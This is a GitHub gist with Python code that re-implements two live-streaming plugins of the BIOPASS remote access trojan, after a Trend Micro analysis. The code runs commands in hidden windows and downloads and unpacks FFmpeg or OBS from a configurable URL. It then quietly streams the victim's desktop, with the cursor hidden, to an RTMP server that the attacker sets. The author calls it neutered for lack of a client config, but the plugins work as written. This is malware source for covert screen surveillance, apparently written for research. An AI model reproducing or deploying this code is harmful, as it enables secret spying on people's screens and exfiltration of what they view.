Skip to content

Instantly share code, notes, and snippets.

@Und3rf10w
Last active July 15, 2021 10:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Und3rf10w/d02b134c9f5aa3401e76db825aa8f941 to your computer and use it in GitHub Desktop.
Save Und3rf10w/d02b134c9f5aa3401e76db825aa8f941 to your computer and use it in GitHub Desktop.
Implementation of plugins.Open_Obs_live and plugins.OpenFFmpegLive from BIOPASS RAT as seen in: https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html
# Author: @Und3rf10w
# See: https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html
# You'd still have to set up the client config and define certain parameters. Leaving this neutered as is for now
import json
import win32com.client
import win32con, win32gui, win32print
import win32api
import os
import traceback
import zipfile
import requests
import time
# TODO:
# - Set up client.parameters['Bitrate', 'FPS', 'rtmp_key', 'rtmp_server', 'download_url', 'push_url', 'MonitorID']
def Common_shell_exec_A(commands="", runpath=""):
    """Run *commands* through ``cmd.exe /c`` using ``win32api.ShellExecute``.

    Args:
        commands: Command line appended after ``/c``.
        runpath: Working directory handed to ``ShellExecute``. An empty
            string selects the directory named by the ``temp`` environment
            variable.

    Returns:
        ``None`` when ``ShellExecute`` returns without raising; otherwise
        ``{'status': False, 'result': <traceback text>}``.
    """
    if runpath == "":
        runpath = os.getenv('temp')
    try:
        # The final argument is ShellExecute's show-window flag; 0 is
        # SW_HIDE in the Win32 API.
        win32api.ShellExecute(0, 'open', 'cmd.exe', f"/c {commands}", runpath, 0)
    except Exception:
        # Only real errors are converted to a result dict; KeyboardInterrupt
        # and SystemExit are allowed to propagate.
        return {'status': False, 'result': traceback.format_exc()}  # Added for debug
    return None
def Common_download_file(download_url, download_path):
    """Fetch *download_url* with ``requests`` and write the body to *download_path*.

    Args:
        download_url: URL passed to ``requests.get``.
        download_path: Path of the file to create (opened in ``'wb'`` mode).

    Returns:
        ``{'status': True, 'result': 'Download file success'}`` on success,
        or ``{'status': False, 'result': <traceback text>}`` when the request,
        the HTTP status check, or the file write raises.
    """
    try:
        download_response = requests.get(download_url)
        download_response.raise_for_status()
        # The context manager closes the handle even if a write fails.
        with open(download_path, 'wb') as destination_file:
            for chunk in download_response.iter_content(100000):
                destination_file.write(chunk)
    except Exception:
        return {'status': False, 'result': traceback.format_exc()}
    return {'status': True, 'result': 'Download file success'}
class Decompress_file:
    """Extract every member of a zip archive into a destination directory.

    ``parameters`` must provide:
        ``zip_src``: path of the archive to read.
        ``dst_dir``: directory the members are extracted into.

    The outcome is stored in ``self.result`` as
    ``{'status': bool, 'result': str}``; ``execute`` itself returns ``None``.
    """

    def __init__(self, parameters):
        self.parameters = parameters
        self.result = {'status': False, 'result': 'No Result'}

    def execute(self):
        """Extract the archive and record success or the traceback text."""
        try:
            # The context manager closes the archive handle on every path,
            # so the zip file can be deleted right afterwards.
            with zipfile.ZipFile(self.parameters['zip_src'], 'r') as zip_location:
                zip_location.extractall(self.parameters['dst_dir'])
            self.result = {'status': True, 'result': 'success'}
        except Exception:
            self.result = {'status': False, 'result': traceback.format_exc()}
class Close_FfmpegLive:
    """Terminate any running ``ffmpeg.exe`` process via ``TASKKILL``.

    The outcome is stored in ``self.result`` as
    ``{'status': bool, 'result': str}``; ``execute`` returns ``None``.
    """

    def __init__(self, parameters):
        self.parameters = parameters
        self.result = {'status': False, 'result': 'No Result'}

    def execute(self):
        """Issue ``TASKKILL /F /IM ffmpeg.exe`` and record the outcome."""
        try:
            command = Common_shell_exec_A('TASKKILL /F /IM ffmpeg.exe')
            # The helper signals failure by returning a status dict rather
            # than raising; surface that instead of reporting success.
            if isinstance(command, dict) and not command.get('status', True):
                self.result = command
                return
            time.sleep(1)
            self.result = {'status': True, 'result': str(command)}
        except Exception:
            # An exception means the kill was not issued: report failure.
            self.result = {'status': False, 'result': traceback.format_exc()}
# Plugin that launches ffmpeg.exe to capture the desktop and push it as an FLV
# stream to parameters['push_url'].
# Reads parameters['download_url'] (only when ffmpeg.exe is absent) and
# parameters['push_url']. The outcome is stored in self.result as
# {'status': bool, 'result': str}; execute() returns nothing.
class Open_FfmpegLive:
def __init__(self, parameters):
self.parameters = parameters
self.result = {'status': False, 'result': 'No Result'}
def execute(self):
try:
# ffmpeg.exe is expected directly inside the directory named by the
# 'public' environment variable.
ffmpeg_path = os.path.join(os.getenv('public'), 'ffmpeg.exe')
if not os.path.exists(ffmpeg_path):
# Binary missing: download a zip to <public>\ffmpeg.zip and extract it into
# <public>. Neither the download result dict nor decompress_ffmpeg.result
# is inspected here.
ffmpeg_zip_path = os.path.join(os.getenv('public'), 'ffmpeg.zip')
Common_download_file(self.parameters['download_url'], ffmpeg_zip_path)
decompress_ffmpeg=Decompress_file({'zip_src': ffmpeg_zip_path, 'dst_dir': os.getenv('public')})
decompress_ffmpeg.execute()
# Best-effort removal of the downloaded archive; any error is ignored.
try:
os.remove(ffmpeg_zip_path)
except:
pass
# Arguments as written: gdigrab input "desktop", cursor drawing off
# (-draw_mouse 0), yuv420p pixel format, libx264 codec, 5 fps (-r 5),
# 1024k video bitrate and buffer size, FLV output to push_url.
# The last ShellExecute argument (0) is the show-window flag (SW_HIDE in the
# Win32 API). The value returned by ShellExecute is stored but not used.
command = win32api.ShellExecute(0, 'open', ffmpeg_path, f" -f gdigrab -i desktop -draw_mouse 0 -pix_fmt yuv420p -vcodec libx264 -r 5 -b:v 1024k -bufsize 1024k -f flv {self.parameters['push_url']}", os.getenv('public'), 0)
# Common_xlog('args:' + f" -f gdigrab -i desktop -draw_mouse 0 -pix_fmt yuv420p -vcodec libx264 -r 5 -b:v 1024k -bufsize 1024k -f flv {self.parameters['push_url']}")
# Common_xlog('ffresult:'+str (command))
self.result = {'status': True, 'result': 'Start live broadcast success'}
except:
# Any exception raised above is recorded as a failure with its traceback text.
self.result = {'status': False, 'result': traceback.format_exc()}
class Close_Obs_Live:
    """Terminate any running ``obs64.exe`` process via ``TASKKILL``.

    The outcome is stored in ``self.result`` as
    ``{'status': bool, 'result': str}``; ``execute`` returns ``None``.
    """

    def __init__(self, parameters):
        self.parameters = parameters
        self.result = {'status': False, 'result': 'No Result'}

    def execute(self):
        """Issue ``TASKKILL /F /IM obs64.exe`` and record the outcome."""
        try:
            outcome = Common_shell_exec_A('TASKKILL /F /IM obs64.exe')
            # The helper signals failure by returning a status dict rather
            # than raising; surface that instead of reporting success.
            if isinstance(outcome, dict) and not outcome.get('status', True):
                self.result = outcome
                return
            time.sleep(1)
            self.result = {'status': True, 'result': 'Close OBS Success'}
        except Exception:
            # An exception means the kill was not issued: report failure.
            self.result = {'status': False, 'result': traceback.format_exc()}
# Plugin that writes an OBS Studio profile named "abcd" plus a custom RTMP
# service definition, then launches obs64.exe through Common_shell_exec_A.
# Reads client_parameters['MonitorID', 'download_url', 'FPS', 'Bitrate',
# 'rtmp_key', 'rtmp_server']. The outcome is stored in self.result as
# {'status': bool, 'result': str}.
class Open_Obs_live:
# The constructor does real work: it queries the display size and, when the
# OBS binary or the profile's basic.ini is missing, downloads and unpacks an
# OBS archive. Nothing here is wrapped in try/except, so errors propagate to
# whoever constructs the object.
def __init__(self, client_parameters):
self.result = {'status': False, 'result': 'No Result'}
self.parameters = client_parameters
# Both config files live under <public>\obs\config\obs-studio\basic\profiles\abcd.
self.basic_config_path = os.path.join(os.getenv('public'), 'obs', 'config', 'obs-studio', 'basic', 'profiles',
'abcd', 'basic.ini')
self.rtmp_config_path = os.path.join(os.getenv('public'), 'obs', 'config', 'obs-studio', 'basic', 'profiles',
'abcd', 'service.json')
# MonitorID is converted to int and passed to win32gui.GetDC; the returned
# device context is queried for DESKTOPHORZRES / DESKTOPVERTZRES.
# NOTE(review): no ReleaseDC call is visible for this handle in this file.
win32_device_capabilities = win32gui.GetDC(int(self.parameters['MonitorID']))
self.width = win32print.GetDeviceCaps(win32_device_capabilities, win32con.DESKTOPHORZRES)
self.height = win32print.GetDeviceCaps(win32_device_capabilities, win32con.DESKTOPVERTZRES)
# The binary directory is spelled 'OBS' while the config paths above use 'obs'.
self.obs_dir = os.path.join(os.getenv('public'), 'OBS', 'bin', '64bit')
self.obs_bin_name = 'obs64.exe'
self.obs_path = os.path.join(self.obs_dir, self.obs_bin_name)
if not os.path.exists(self.obs_path) or not os.path.exists(self.basic_config_path):
# Download the archive to <public>\obs.zip and extract it into <public>.
# Neither the download result dict nor unzip_obs.result is inspected here.
local_obs_zip_path = os.path.join(os.getenv('public'), 'obs.zip')
Common_download_file(self.parameters['download_url'], local_obs_zip_path) # download from $0 to $1
unzip_obs = Decompress_file({'zip_src': local_obs_zip_path, 'dst_dir': os.getenv('public')})
unzip_obs.execute()
# Best-effort removal of the downloaded archive; any error is ignored.
try:
os.remove(local_obs_zip_path)
except:
pass
# Writes basic.ini (video size from the queried resolution, FPS and bitrate
# from parameters) and service.json (custom RTMP server and key).
# Exceptions are caught here and recorded in self.result; they are not re-raised.
def config(self):
try:
obs_config = f'''[General]
Name=abcd
[Video]
BaseCX={self.width}
BaseCy={self.height}
OutputCX={self.width}
OutputCY={self.height}
FPSType=0
FPSCommon={self.parameters['FPS']}
[Panels]
CookieId=A35038958F3C987F
[SimpleOutput]
VBitrate={self.parameters['Bitrate']}
StreamEncoder=x264
RecQuality=Stream
[Output]
Mode=Simple
'''
rtmp_config = {
"settings": {"bwtest": False, "key": self.parameters['rtmp_key'], "server": self.parameters['rtmp_server'],
"use_auth": False}, "type": "rtmp_custom"}
with open(self.basic_config_path, 'w') as f:
f.write(obs_config)
# Redundant: the enclosing with-block already closes the file.
f.close()
with open(self.rtmp_config_path, 'w') as f:
f.write(json.dumps(rtmp_config, sort_keys=True, indent=4))
except:
self.result = {'status': False, 'result': traceback.format_exc()}
# Writes the configuration, then starts OBS with "-p" from its own directory.
# Because config() swallows its own exceptions, a failure recorded there is
# overwritten by the success result assigned below. The return value of
# Common_shell_exec_A is not inspected.
def execute(self):
try:
self.config()
Common_shell_exec_A(self.obs_path + " -p", self.obs_dir) # -p = "Use portable mode"
self.result = {'status': True, 'result': 'Open OBS Live Success'}
except:
self.result = {'status': False, 'result': traceback.format_exc()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment